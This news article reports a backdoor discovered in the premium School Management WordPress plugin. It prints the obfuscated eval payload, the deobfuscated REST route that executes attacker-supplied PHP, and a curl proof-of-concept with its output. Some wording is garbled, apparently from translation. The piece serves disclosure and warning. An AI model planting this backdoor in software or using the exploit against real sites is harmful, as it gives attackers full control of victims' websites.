Investigators said Friday they had found a malicious backdoor in a WordPress plugin that gave attackers complete control over websites using the package, which is sold in schools.
The premium version of School Management, a plug-in that schools use to operate and manage their websites, has included the backdoor since at least version 8.9, researchers at website security service JetPack said in a blog post without excluding its presence in earlier versions. used to be. † This page from a third-party site shows that version 8.9 was released last August.
Clear back door
Jetpack said it discovered the backdoor after members of the WordPress.com support team reported finding heavily obfuscated code on several sites using School Management Pro. After exposing it, they realized that the code, stored in the license control portion of the plugin, had been deliberately placed there for the purpose of giving outsiders the ability to take control of sites.
“The code itself isn’t that interesting: it’s an obvious backdoor injected into the plugin’s license check code,” according to the JetPack post. “It allows any attacker to run arbitrary PHP code on the site with the plugin installed.”
In its obfuscated form, the code looked like this:
} $_fc = eval("\x65\x76\x61\x6c(\x67\x7a".chr($_x = 0x70 - 7).chr($_x += 5).chr($_x -= 8) . "\x6c\x61\x74" . "\x65\x28\x62"."\x61\x73\x65\x36"."\x34\x5f\x64\x65\x63\x6f\x64\x65\x28'fY9BasMwEEXX8ikmECIbnAukJJAW77ooSaCLUsTYHjsilu2O5JRQfPdKDs2mbbTQQu/9mS8sS4WF010bg2SyTmGvlW61kylUQ3tFCXxFgqnW1hGrSeNucBRHQkg0S0MmJ/YJ2eiCWksy9QSZ8RIUIQ25Y1daCbDewOuL2mX7g9oTn4lXq6ddtj1sH5+zdHILbJoci5MM7q0CzJk+Br8ZpjL+zJFrC+sbWG5qcqpHRmPj5GFydAUxaGvJ+QHBf5N5031W2h7lu5+0WMAMyPTu8i//I303OsGfjoLO2Pzm13JjuMfw6SQS/m304Bs="" . str_repeat(chr(0x29), 3)."\x3b"); class WLSM_Crypt_Blowfish_DefaultKey
After deobfuscation the code was:
add_action( "rest_api_init', function() {
register_rest_route(
'am-member', 'license',
array(
'methods' => WP_REST_Server::CREATABLE,
'callback' => function( $request ) {
$args = $request->get_params();
if ( isset( $args['blowfish'] ) && ! empty( $args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf'] ) ) {
eval( $args['blowf'] );
}
},
)
);
} );
Researchers wrote a proof-of-concept exploit that confirmed that the obfuscated code was indeed a backdoor that allowed anyone with knowledge to run code of their choice on any site running the plugin.
$ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/wp-content/plugins/school-management-pro-9.9.4/admin/inc/manager/WLSM_LC.php(683) : eval()'d code(1) : eval()'d code(9) : eval()'d code:1) in /var/www/html/wp-includes/rest-api/class-wp-rest-server.php on line 1713
The mystery remains
It is not clear how many sites are using the plugin. Weblizar, the India-based maker of School Management, says on its homepage that it has “340k+” customers for its free and premium themes and plugins, but the backdoor that JetPack found was only in School Management Pro. The backdoor was not included in the free version of the plugin, and there is no indication that it was included in any other plugins that Weblizar publishes.
“We’ve been trying to get more information from the vendor about when the backdoor was injected, which versions are affected, and how the code got into the plugin in the first place,” the post reads. “This attempt was unsuccessful because the vendor says they don’t know when or how the code got into their software.”
Attempts to reach Weblizar were unsuccessful.
Now that the backdoor’s presence is widely known, attackers are likely to exploit it on any website that uses a vulnerable version of the plugin. Anyone using this plugin should update immediately. Even after patching, they should carefully scan their site for signs of compromise as the update doesn’t remove any new backdoors that may have been added.